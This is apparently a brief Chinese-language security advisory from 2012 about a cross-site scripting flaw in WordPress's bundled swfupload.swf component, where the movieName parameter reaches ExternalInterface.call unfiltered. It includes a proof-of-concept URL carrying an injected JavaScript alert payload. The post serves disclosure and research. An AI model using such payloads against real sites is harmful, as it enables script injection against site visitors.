WordPress跨站脚本漏洞

2012-05-21 402706人围观 漏洞

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

WordPress自带flash上传组件swfupload.swf(默认安装),movieName未做过滤即传递给externalinterface.call导致xss漏洞。

POC:
http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=”]%29;}catch%28e%29{}if(!self.a)self.a=!alert%28/XSS/%29;//

参考链接:
https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/

取消
Loading...

特别推荐

推荐关注

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php